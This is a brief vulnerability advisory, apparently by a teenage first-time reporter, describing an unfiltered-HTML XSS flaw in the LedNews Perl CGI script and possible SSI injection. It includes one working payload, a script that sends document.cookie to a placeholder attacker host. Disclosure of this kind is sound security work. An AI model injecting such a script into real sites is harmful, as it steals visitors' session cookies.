lednews.txt

`XSS Vulnerability in LedNews (CGI/Perl) v0.7  
  
URL: http://www.ledscripts.com/index.php?page=free:perl:lednews  
  
Description  
=======  
  
LedNews is a CGI application written entirely in perl. Its designed to be as   
simple as possible, but very powerful at the same thing.  
  
Vulnerability  
========  
  
The script does not attempt to filter out javascript or any other HTML tags.   
So the posting message :  
  
<script>  
document.location.replace('http://evil-haxor.com/cgi-bin/cookiemonster.cgi?'+document.cookie);  
</script>  
  
as news will send cookies to your CGI script.  
  
P.S.:  
It may also be possible to put SSI tags in news posts, since the script does   
not seem to do the usual filtering for them. I did not test this because i'm   
to lazy to install SSI on my system.  
  
About me  
=======  
  
I'm gilbert from Team UEC. I'm 16 years old.  
I dream about a job in security someday.  
This is my first time posting a vulnerability.  
I can always be contacted at [email protected]  
  
Thank you for reading this and have a nice day,  
  
Gilbert  
  
_________________________________________________________________  
STOP MORE SPAM with the new MSN 8 and get 2 months FREE*   
http://join.msn.com/?page=features/junkmail  
  
`